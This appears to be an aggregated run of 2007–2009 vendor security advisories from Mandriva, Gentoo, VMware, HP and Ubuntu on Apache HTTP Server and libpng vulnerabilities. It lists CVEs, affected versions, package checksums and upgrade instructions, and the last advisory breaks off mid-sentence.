2007.0/x86_64/apache-mod_ldap-2.2.3-1.1mdv2007.0.x86_64.rpm 7de4b739d93683648209dcdc69dd5473 2007.0/x86_64/apache-mod_mem_cache-2.2.3-1.1mdv2007.0.x86_64.rpm 85fde2923d945f3849d77f806b8bc55d 2007.0/x86_64/apache-mod_proxy-2.2.3-1.1mdv2007.0.x86_64.rpm b68991944f2989b6d3f89f7272239d76 2007.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.1mdv2007.0.x86_64.rpm 19871683773211daa721957dc5dd565d 2007.0/x86_64/apache-mod_ssl-2.2.3-1.1mdv2007.0.x86_64.rpm 5cf2a97219d6789e4572da1ecddedf16 2007.0/x86_64/apache-mod_userdir-2.2.3-1.1mdv2007.0.x86_64.rpm feede872aaf0ca4bbd86ffe24455e9cd 2007.0/x86_64/apache-modules-2.2.3-1.1mdv2007.0.x86_64.rpm a00a35d4eba8f538cea741b2fc4079f4 2007.0/x86_64/apache-mpm-prefork-2.2.3-1.1mdv2007.0.x86_64.rpm da86251e4417f068d2cafed30e380779 2007.0/x86_64/apache-mpm-worker-2.2.3-1.1mdv2007.0.x86_64.rpm ceb7fd32d3ad933ab6a914085f858911 2007.0/x86_64/apache-source-2.2.3-1.1mdv2007.0.x86_64.rpm 411b90e42ed304f329e9989d64a9dfc5 2007.0/SRPMS/apache-2.2.3-1.1mdv2007.0.src.rpm Mandriva Linux 2007.1: 9daef91724ded29a3c76e74c261f7766 2007.1/i586/apache-base-2.2.4-6.2mdv2007.1.i586.rpm 9288ee938a0853d6e0072f839c68c1c2 2007.1/i586/apache-devel-2.2.4-6.2mdv2007.1.i586.rpm 613a986f9f654f1ce3432ee6f6db2391 2007.1/i586/apache-htcacheclean-2.2.4-6.2mdv2007.1.i586.rpm 8e0eb376d851d1ddba8850d4233fc3d3 2007.1/i586/apache-mod_authn_dbd-2.2.4-6.2mdv2007.1.i586.rpm 24de68668efa15e4abaaffd690837256 2007.1/i586/apache-mod_cache-2.2.4-6.2mdv2007.1.i586.rpm 288866908d43959c4b31c368346ba65d 2007.1/i586/apache-mod_dav-2.2.4-6.2mdv2007.1.i586.rpm d25838ec739d7a0037148f573262f81c 2007.1/i586/apache-mod_dbd-2.2.4-6.2mdv2007.1.i586.rpm ebad14bcccb73c8f8a27e98a6982a6f1 2007.1/i586/apache-mod_deflate-2.2.4-6.2mdv2007.1.i586.rpm 810d445f2146848b582e798e368b32ab 2007.1/i586/apache-mod_disk_cache-2.2.4-6.2mdv2007.1.i586.rpm 307de93279683b5b3e76ee6d971781cc 2007.1/i586/apache-mod_file_cache-2.2.4-6.2mdv2007.1.i586.rpm f59890e1bc38cfa598a4100705cf4cc6 2007.1/i586/apache-mod_ldap-2.2.4-6.2mdv2007.1.i586.rpm 098a05d1cbaa6bfa2d2707896dd6366c 2007.1/i586/apache-mod_mem_cache-2.2.4-6.2mdv2007.1.i586.rpm 6504f5e57440ff07da16de3d928898f6 2007.1/i586/apache-mod_proxy-2.2.4-6.2mdv2007.1.i586.rpm adc3a611a780e23178e93a6cedf135d4 2007.1/i586/apache-mod_proxy_ajp-2.2.4-6.2mdv2007.1.i586.rpm 659508a67fbe28b5dd9f861384ca1cf1 2007.1/i586/apache-mod_ssl-2.2.4-6.2mdv2007.1.i586.rpm 604eb70716d7e7b6bc6e8399cc4d9f5c 2007.1/i586/apache-mod_userdir-2.2.4-6.2mdv2007.1.i586.rpm 750d7cb431356abc88fe7a031f872b04 2007.1/i586/apache-modules-2.2.4-6.2mdv2007.1.i586.rpm 210be718db221db891452f05a001ee4e 2007.1/i586/apache-mpm-event-2.2.4-6.2mdv2007.1.i586.rpm 482e3d3af6756108c3e9a26ec2a8ac56 2007.1/i586/apache-mpm-itk-2.2.4-6.2mdv2007.1.i586.rpm b76ff4578c127ebd248b21a85a31140a 2007.1/i586/apache-mpm-prefork-2.2.4-6.2mdv2007.1.i586.rpm 2484dee8a4d4e7604a69abcd1b443954 2007.1/i586/apache-mpm-worker-2.2.4-6.2mdv2007.1.i586.rpm 9823f9b97e1829df97999494c3a3d453 2007.1/i586/apache-source-2.2.4-6.2mdv2007.1.i586.rpm ccbd9fad2b29ff86d8601f7201f48d72 2007.1/SRPMS/apache-2.2.4-6.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 4d043339268bff11fa07897ee3dc2988 2007.1/x86_64/apache-base-2.2.4-6.2mdv2007.1.x86_64.rpm afbae73f408fa95c9e4d25e3aa39583d 2007.1/x86_64/apache-devel-2.2.4-6.2mdv2007.1.x86_64.rpm d92c22ff28fcd919b3a8525f753066c3 2007.1/x86_64/apache-htcacheclean-2.2.4-6.2mdv2007.1.x86_64.rpm abe81d2effd6f4975accbdc8d25d089e 2007.1/x86_64/apache-mod_authn_dbd-2.2.4-6.2mdv2007.1.x86_64.rpm 480d5c31af3289f26953a691f92e2a51 2007.1/x86_64/apache-mod_cache-2.2.4-6.2mdv2007.1.x86_64.rpm 3feae93ade4038e67fcbaa691f2a74aa 2007.1/x86_64/apache-mod_dav-2.2.4-6.2mdv2007.1.x86_64.rpm b60eead7fe808fbc5eff6cb34f1de80b 2007.1/x86_64/apache-mod_dbd-2.2.4-6.2mdv2007.1.x86_64.rpm 023afee3221da629fd8e1d34006b7463 2007.1/x86_64/apache-mod_deflate-2.2.4-6.2mdv2007.1.x86_64.rpm 1180446c8cf65c196352006d6da00e17 2007.1/x86_64/apache-mod_disk_cache-2.2.4-6.2mdv2007.1.x86_64.rpm 0e8c2dfc0e42c23b0afbada9f8868bb6 2007.1/x86_64/apache-mod_file_cache-2.2.4-6.2mdv2007.1.x86_64.rpm 32aa45f45b8893d6c23c6892b7ad7e62 2007.1/x86_64/apache-mod_ldap-2.2.4-6.2mdv2007.1.x86_64.rpm 15c20ffb5fdc8ab2a6fa92157c9f0536 2007.1/x86_64/apache-mod_mem_cache-2.2.4-6.2mdv2007.1.x86_64.rpm f91fd6552f480eb36d030bb2e91d30b4 2007.1/x86_64/apache-mod_proxy-2.2.4-6.2mdv2007.1.x86_64.rpm 2c9d1e35af7adebaeb6284bf5da4dd5f 2007.1/x86_64/apache-mod_proxy_ajp-2.2.4-6.2mdv2007.1.x86_64.rpm caa59aaba47c89d20e799a3f02271afd 2007.1/x86_64/apache-mod_ssl-2.2.4-6.2mdv2007.1.x86_64.rpm 8ac44f8c409ea29492a3acdc1eb44c7f 2007.1/x86_64/apache-mod_userdir-2.2.4-6.2mdv2007.1.x86_64.rpm 0f2198ec988390ff3b7843a1e7090517 2007.1/x86_64/apache-modules-2.2.4-6.2mdv2007.1.x86_64.rpm 2548664fde736f25acf59f46c847d1ff 2007.1/x86_64/apache-mpm-event-2.2.4-6.2mdv2007.1.x86_64.rpm 2434c402bae11969ddf5281f2f042d24 2007.1/x86_64/apache-mpm-itk-2.2.4-6.2mdv2007.1.x86_64.rpm 8a06ecd19726db033496a042c6a6be2f 2007.1/x86_64/apache-mpm-prefork-2.2.4-6.2mdv2007.1.x86_64.rpm e8d339c397409391f3fb36f704c38c6c 2007.1/x86_64/apache-mpm-worker-2.2.4-6.2mdv2007.1.x86_64.rpm 8a6f923428242f7aa1b4d489739e241b 2007.1/x86_64/apache-source-2.2.4-6.2mdv2007.1.x86_64.rpm ccbd9fad2b29ff86d8601f7201f48d72 2007.1/SRPMS/apache-2.2.4-6.2mdv2007.1.src.rpm Corporate 4.0: 74beb8d1579ce5d5f12c8b15981b6e63 corporate/4.0/i586/apache-base-2.2.3-1.1.20060mlcs4.i586.rpm 326a8259b0d99bc2938bfa6cd85743e7 corporate/4.0/i586/apache-devel-2.2.3-1.1.20060mlcs4.i586.rpm ca305d0928255a65814af781b345a056 corporate/4.0/i586/apache-htcacheclean-2.2.3-1.1.20060mlcs4.i586.rpm 48c2b6a5ee11c3f011b1f6dc60a86479 corporate/4.0/i586/apache-mod_authn_dbd-2.2.3-1.1.20060mlcs4.i586.rpm b81a3077cb88a34af43a61ad6f2559ea corporate/4.0/i586/apache-mod_cache-2.2.3-1.1.20060mlcs4.i586.rpm ba5aee0b2a86182560e54f0cf4d360bd corporate/4.0/i586/apache-mod_dav-2.2.3-1.1.20060mlcs4.i586.rpm b696352106c5a0d1697385523455c767 corporate/4.0/i586/apache-mod_dbd-2.2.3-1.1.20060mlcs4.i586.rpm e79f271f000dd7f3a009cca70fd7e4a2 corporate/4.0/i586/apache-mod_deflate-2.2.3-1.1.20060mlcs4.i586.rpm c7bdb987f61099b64e751639ca02dd8a corporate/4.0/i586/apache-mod_disk_cache-2.2.3-1.1.20060mlcs4.i586.rpm b0303fcc2f43bdcf25419dde56df2297 corporate/4.0/i586/apache-mod_file_cache-2.2.3-1.1.20060mlcs4.i586.rpm f818ff0f890abe230c92069f9d256e5c corporate/4.0/i586/apache-mod_ldap-2.2.3-1.1.20060mlcs4.i586.rpm 4247be23e42c368b3880c7ab5ac13c89 corporate/4.0/i586/apache-mod_mem_cache-2.2.3-1.1.20060mlcs4.i586.rpm e50f1749935c96d3364bdce9af5d22bf corporate/4.0/i586/apache-mod_proxy-2.2.3-1.1.20060mlcs4.i586.rpm a619b4e0130d1db7f77a790fee0917a6 corporate/4.0/i586/apache-mod_proxy_ajp-2.2.3-1.1.20060mlcs4.i586.rpm 8170e0e77256f08d07b02119400a19f9 corporate/4.0/i586/apache-mod_ssl-2.2.3-1.1.20060mlcs4.i586.rpm 4a5d94d4f94295efe48266a1d529486e corporate/4.0/i586/apache-mod_userdir-2.2.3-1.1.20060mlcs4.i586.rpm 7c0c27197d6b44115366eac339c424f2 corporate/4.0/i586/apache-modules-2.2.3-1.1.20060mlcs4.i586.rpm 56351aafc723fdea2f2fac22d5046944 corporate/4.0/i586/apache-mpm-prefork-2.2.3-1.1.20060mlcs4.i586.rpm ccbb2f27b762b5dd564dc7a00aac6db0 corporate/4.0/i586/apache-mpm-worker-2.2.3-1.1.20060mlcs4.i586.rpm a65137ff29ed6a1da1f894d19997faec corporate/4.0/i586/apache-source-2.2.3-1.1.20060mlcs4.i586.rpm 8cdf592a822485abba00dfb6591615ea corporate/4.0/SRPMS/apache-2.2.3-1.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 7a9b4f5b3fcf2cac67e4c38022ee2441 corporate/4.0/x86_64/apache-base-2.2.3-1.1.20060mlcs4.x86_64.rpm 5604ba341d957fbe6182bd2eb29a8e9d corporate/4.0/x86_64/apache-devel-2.2.3-1.1.20060mlcs4.x86_64.rpm 8983bda4bbe3b58f9c6c317531eb52b7 corporate/4.0/x86_64/apache-htcacheclean-2.2.3-1.1.20060mlcs4.x86_64.rpm 9baf252cbc8ef8a093ed25e7a0daf25d corporate/4.0/x86_64/apache-mod_authn_dbd-2.2.3-1.1.20060mlcs4.x86_64.rpm 26cc58bcbfd25a83c15051c8f590a36d corporate/4.0/x86_64/apache-mod_cache-2.2.3-1.1.20060mlcs4.x86_64.rpm 941a32aea1b1b3bca1ae343d5d925892 corporate/4.0/x86_64/apache-mod_dav-2.2.3-1.1.20060mlcs4.x86_64.rpm 1d79a7b921ce150de88e22ffbaba4b31 corporate/4.0/x86_64/apache-mod_dbd-2.2.3-1.1.20060mlcs4.x86_64.rpm d80b9ffca3dd024e73d069e55ba7fa3e corporate/4.0/x86_64/apache-mod_deflate-2.2.3-1.1.20060mlcs4.x86_64.rpm 7a7a11645680a7bee9cf88b166b0d32f corporate/4.0/x86_64/apache-mod_disk_cache-2.2.3-1.1.20060mlcs4.x86_64.rpm fcc85c0f9faf1fa08a01f3d4ecb68033 corporate/4.0/x86_64/apache-mod_file_cache-2.2.3-1.1.20060mlcs4.x86_64.rpm 55789d16ff565bcd31dfa522435d4d4b corporate/4.0/x86_64/apache-mod_ldap-2.2.3-1.1.20060mlcs4.x86_64.rpm 7ee708824d65878b71ede35e139ac94d corporate/4.0/x86_64/apache-mod_mem_cache-2.2.3-1.1.20060mlcs4.x86_64.rpm e8579835f848cade641da14354196497 corporate/4.0/x86_64/apache-mod_proxy-2.2.3-1.1.20060mlcs4.x86_64.rpm 6a1e70a638aecf603f3bc2485d14bd78 corporate/4.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.1.20060mlcs4.x86_64.rpm 212f40574d0821b909972ebc36fb697a corporate/4.0/x86_64/apache-mod_ssl-2.2.3-1.1.20060mlcs4.x86_64.rpm 32a8dd886e42c8093be05c9ee4d31855 corporate/4.0/x86_64/apache-mod_userdir-2.2.3-1.1.20060mlcs4.x86_64.rpm 265bccd86baa7fca942f1c6d4d694523 corporate/4.0/x86_64/apache-modules-2.2.3-1.1.20060mlcs4.x86_64.rpm babdb585a6c754f23d91c41fc844a5e2 corporate/4.0/x86_64/apache-mpm-prefork-2.2.3-1.1.20060mlcs4.x86_64.rpm 63274f5c5dc3897d0062f621b1c63e0e corporate/4.0/x86_64/apache-mpm-worker-2.2.3-1.1.20060mlcs4.x86_64.rpm 18782a1fcbcb760d36162ce830ac4cdd corporate/4.0/x86_64/apache-source-2.2.3-1.1.20060mlcs4.x86_64.rpm 8cdf592a822485abba00dfb6591615ea corporate/4.0/SRPMS/apache-2.2.3-1.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFGjD3WmqjQ0CJFipgRAtGoAKCXMGCKCMbkso0ugvF0TpsWNwkPjgCfVakS Re00IyLecNs4MIGgsrv2qJE= =5EEm -----END PGP SIGNATURE----- . Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-servers/apache < 2.2.6 *>= 2.0.59-r5 >= 2.2.6 Description =========== Multiple cross-site scripting vulnerabilities have been discovered in mod_status and mod_autoindex (CVE-2006-5752, CVE-2007-4465). An error has been discovered in the recall_headers() function in mod_mem_cache (CVE-2007-1862). The mod_cache module does not properly sanitize requests before processing them (CVE-2007-1863). The Prefork module does not properly check PID values before sending signals (CVE-2007-3304). The mod_proxy module does not correctly check headers before processing them (CVE-2007-3847). Impact ====== A remote attacker could exploit one of these vulnerabilities to inject arbitrary script or HTML content, obtain sensitive information or cause a Denial of Service. Workaround ========== There is no known workaround at this time. Resolution ========== All Apache users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-servers/apache-2.0.59-r5" References ========== [ 1 ] CVE-2006-5752 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5752 [ 2 ] CVE-2007-1862 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1862 [ 3 ] CVE-2007-1863 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1863 [ 4 ] CVE-2007-3304 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3304 [ 5 ] CVE-2007-3847 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3847 [ 6 ] CVE-2007-4465 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4465 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200711-06.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . Summary Updated VMware Hosted products address security issues in libpng and the Apace HTTP Server. 2. Relevant releases VMware Workstation 6.5.2 and earlier, VMware Player 2.5.2 and earlier, VMware ACE 2.5.2 and earlier 3. Problem Description a. Third Party Library libpng Updated to 1.2.35 Several flaws were discovered in the way third party library libpng handled uninitialized pointers. An attacker could create a PNG image file in such a way, that when loaded by an application linked to libpng, it could cause the application to crash or execute arbitrary code at the privilege level of the user that runs the application. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2009-0040 to this issue. The following table lists what action remediates the vulnerability (column 4) if a solution is available. VMware Product Running Replace with/ Product Version on Apply Patch ============= ======== ======= ================= VirtualCenter any Windows not affected Workstation 6.5.x any 6.5.3 build 185404 or later Player 2.5.x any 2.5.3 build 185404 or later ACE 2.5.x any 2.5.3 build 185404 or later Server 2.x any patch pending Server 1.x any patch pending Fusion 2.x Mac OS/X not affected Fusion 1.x Mac OS/X not affected ESXi 4.0 ESXi not affected ESXi 3.5 ESXi not affected ESX 4.0 ESX not affected ESX 3.5 ESX not affected ESX 3.0.3 ESX not affected ESX 3.0.2 ESX not affected ESX 2.5.5 ESX not affected * * The libpng update for the Service Console of ESX 2.5.5 is documented in VMSA-2009-0007. b. Apache HTTP Server updated to 2.0.63 The new version of ACE updates the Apache HTTP Server on Windows hosts to version 2.0.63 which addresses multiple security issues that existed in the previous versions of this server. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2007-3847, CVE-2007-1863, CVE-2006-5752, CVE-2007-3304, CVE-2007-6388, CVE-2007-5000, CVE-2008-0005 to the issues that have been addressed by this update. The following table lists what action remediates the vulnerability (column 4) if a solution is available. VMware Product Running Replace with/ Product Version on Apply Patch ============= ======== ======= ================= VirtualCenter any Windows not affected Workstation 6.5.x any not affected Player 2.5.x any not affected ACE 2.5.x Windows 2.5.3 build 185404 or later ACE 2.5.x Linux update Apache on host system * Server 2.x any not affected Server 1.x any not affected Fusion 2.x Mac OS/X not affected Fusion 1.x Mac OS/X not affected ESXi 4.0 ESXi not affected ESXi 3.5 ESXi not affected ESX 4.0 ESX not affected ESX 3.5 ESX not affected ESX 3.0.3 ESX not affected ESX 3.0.2 ESX not affected ESX 2.5.5 ESX not affected * The Apache HTTP Server is not part of an ACE install on a Linux host. Update the Apache HTTP Server on the host system to version 2.0.63 in order to remediate the vulnerabilities listed above. 4. Solution Please review the patch/release notes for your product and version and verify the md5sum and/or the sha1sum of your downloaded file. VMware Workstation 6.5.3 ------------------------ http://www.vmware.com/download/ws/ Release notes: http://www.vmware.com/support/ws65/doc/releasenotes_ws653.html For Windows Workstation for Windows 32-bit and 64-bit Windows 32-bit and 64-bit .exe md5sum: 7565d16b7d7e0173b90c3b76ca4656bc sha1sum: 9f687afd8b0f39cde40aeceb3213a91be487aad1 For Linux Workstation for Linux 32-bit Linux 32-bit .rpm md5sum: 4d55c491bd008ded0ea19f373d1d1fd4 sha1sum: 1f43131c960e76a530390d3b6984c78dfc2da23e Workstation for Linux 32-bit Linux 32-bit .bundle md5sum: d4a721c1918c0e8a87c6fa4bad49ad35 sha1sum: c0c6f9b56e70bd3ffdb5467ee176110e283a69e5 Workstation for Linux 64-bit Linux 64-bit .rpm md5sum: 72adfdb03de4959f044fcb983412ae7c sha1sum: ba16163c8d9b5aa572526b34a7b63dc6e68f9bbb Workstation for Linux 64-bit Linux 64-bit .bundle md5sum: 83e1f0c94d6974286256c4d3b559e854 sha1sum: 8763f250a3ac5fc4698bd26319b93fecb498d542 VMware Player 2.5.3 ------------------- http://www.vmware.com/download/player/ Release notes: http://www.vmware.com/support/player25/doc/releasenotes_player253.html Player for Windows binary http://download3.vmware.com/software/vmplayer/VMware-player-2.5.3-185404.exe md5sum: fe28f193374c9457752ee16cd6cad4e7 sha1sum: 13bd3ff93c04fa272544d3ef6de5ae746708af04 Player for Linux (.rpm) http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i386.rpm md5sum: c99cd65f19fdfc7651bcb7f328b73bc2 sha1sum: a33231b26e2358a72d16e1b4e2656a5873fe637e Player for Linux (.bundle) http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i386.bundle md5sum: 210f4cb5615bd3b2171bc054b9b2bac5 sha1sum: 2f6497890b17b37480165bab9f430e8645edae9b Player for Linux - 64-bit (.rpm) http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x86_64.rpm md5sum: f91576ef90b322d83225117ae9335968 sha1sum: f492fa9cf26ee2818f164aac04cde1680c25d974 Player for Linux - 64-bit (.bundle) http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x86_64.bundle md5sum: 595d44d7945c129b1aeb679d2f001b05 sha1sum: acd69fcb0c6bc49fd4af748c65c7fb730ab1e8c4 VMware ACE 2.5.3 ---------------- http://www.vmware.com/download/ace/ Release notes: http://www.vmware.com/support/ace25/doc/releasenotes_ace253.html ACE Management Server Virtual Appliance AMS Virtual Appliance .zip md5sum: 44cc7b86353047f02cf6ea0653e38418 sha1sum: 9f44b15e6681a6e58dd20784f829c68091a62cd1 VMware ACE for Windows 32-bit and 64-bit Windows 32-bit and 64-bit .exe md5sum: 0779da73408c5e649e0fd1c62d23820f sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef ACE Management Server for Windows Windows .exe md5sum: 0779da73408c5e649e0fd1c62d23820f sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef ACE Management Server for SUSE Enterprise Linux 9 SLES 9 .rpm md5sum: a4fc92d7197f0d569361cdf4b8cca642 sha1sum: af8a135cca398cacaa82c8c3c325011c6cd3ed75 ACE Management Server for Red Hat Enterprise Linux 4 RHEL 4 .rpm md5sum: 841005151338c8b954f08d035815fd58 sha1sum: 67e48624dba20e6be9e41ec9a5aba407dd8cc01e 5. Change log 2009-08-20 VMSA-2009-0010 Initial security advisory after release of Workstation 6.5.3, Player 2.5.3, and ACE 2.5.3 on 2009-08-20. - ------------------------------------------------------------------------ 7. Contact E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: * security-announce at lists.vmware.com * bugtraq at securityfocus.com * full-disclosure at lists.grok.org.uk E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055 VMware Security Center http://www.vmware.com/security VMware security response policy http://www.vmware.com/support/policies/security_response.html General support life cycle policy http://www.vmware.com/support/policies/eos.html VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html Copyright 2009 VMware Inc. All rights reserved. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01178795 Version: 1 HPSBUX02262 SSRT071447 rev. 1 - HP-UX running Apache, Remote Arbitrary Code Execution, Cross Site Scripting (XSS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2007-10-02 Last Updated: 2007-10-02 Potential Security Impact: Remote arbitrary code execution, cross site scripting (XSS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with Apache running on HP-UX. The vulnerabilities could be exploited remotely via Cross Site Scripting (XSS) to execute arbitrary code. References: CVE-2005-2090, CVE-2006-5752, CVE-2007-0450, CVE-2007-0774, CVE-2007-1355, CVE-2007-1358, CVE-2007-1860, CVE-2007-1863, CVE-2007-1887, CVE-2007-1900, CVE-2007-2449, CVE-2007-2450, CVE-2007-2756, CVE-2007-2872, CVE-2007-3382, CVE-2007-3385, CVE-2007-3386. SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running Apache BACKGROUND To determine if a system has an affected version, search the output of "swlist -a revision -l fileset" for an affected fileset. Then determine if the recommended patch or update is installed. AFFECTED VERSIONS For IPv4: HP-UX B.11.11 ============= hpuxwsAPACHE action: install revision A.2.0.59.00 or subsequent restart Apache URL: https://www.hp.com/go/softwaredepot/ For IPv6: HP-UX B.11.11 HP-UX B.11.23 HP-UX B.11.31 ============= hpuxwsAPACHE,revision=B.1.0.00.01 hpuxwsAPACHE,revision=B.1.0.07.01 hpuxwsAPACHE,revision=B.1.0.08.01 hpuxwsAPACHE,revision=B.1.0.09.01 hpuxwsAPACHE,revision=B.1.0.10.01 hpuxwsAPACHE,revision=B.2.0.48.00 hpuxwsAPACHE,revision=B.2.0.49.00 hpuxwsAPACHE,revision=B.2.0.50.00 hpuxwsAPACHE,revision=B.2.0.51.00 hpuxwsAPACHE,revision=B.2.0.52.00 hpuxwsAPACHE,revision=B.2.0.53.00 hpuxwsAPACHE,revision=B.2.0.54.00 hpuxwsAPACHE,revision=B.2.0.55.00 hpuxwsAPACHE,revision=B.2.0.56.00 hpuxwsAPACHE,revision=B.2.0.58.00 hpuxwsAPACHE,revision=B.2.0.58.01 action: install revision B.2.0.59.00 or subsequent restart Apache URL: https://www.hp.com/go/softwaredepot/ END AFFECTED VERSIONS RESOLUTION HP has made the following available to resolve the vulnerability. HP-UX Apache-based Web Server v.2.18 powered by Apache Tomcat Webmin or subsequent. The update is available on https://www.hp.com/go/softwaredepot/ Note: HP-UX Apache-based Web Server v.2.18 powered by Apache Tomcat Webmin contains HP-UX Apache-based Web Server v.2.0.59.00. MANUAL ACTIONS: Yes - Update Install HP-UX Apache-based Web Server v.2.18 powered by Apache Tomcat Webmin or subsequent. PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa HISTORY Revision: 1 (rev.1) - 02 October 2007 Initial release Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement." \xa9Copyright 2007 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 iQA/AwUBRwVCruAfOvwtKn1ZEQK1YgCfavU7x1Hs59uLdP26lpZFwMxKofIAn3gJ HHoe3AY1sc6hrW3Xk+B1hcbr =+E1W -----END PGP SIGNATURE----- . =========================================================== Ubuntu Security Notice USN-499-1 August 16, 2007 apache2 vulnerabilities CVE-2006-5752, CVE-2007-1863, CVE-2007-3304 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: apache2-common 2.0.55-4ubuntu2.2 apache2-mpm-prefork 2.0.55-4ubuntu2.2 apache2-mpm-worker 2.0.55-4ubuntu2.2 Ubuntu 6.10: apache2-common 2.0.55-4ubuntu4.1 apache2-mpm-prefork 2.0.55-4ubuntu4.1 apache2-mpm-worker 2.0.55-4ubuntu4.1 Ubuntu 7.04: apache2-mpm-prefork 2.2.3-3.2ubuntu0.1 apache2-mpm-worker 2.2.3-3.2ubuntu0.1 apache2.2-common 2.2.3-3.2ubuntu0.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Stefan Esser discovered that mod_status did not force a character set, which could result in browsers becoming vulnerable to XSS attacks when processing the output. If a user were tricked into viewing server status output during a crafted server request, a remote attacker could exploit this to modify the contents, or steal confidential data (such as passwords), within the same domain. By default, mod_status is disabled in Ubuntu. (CVE-2006-5752) Niklas Edmundsson discovered that the mod_cache module could be made to crash using a 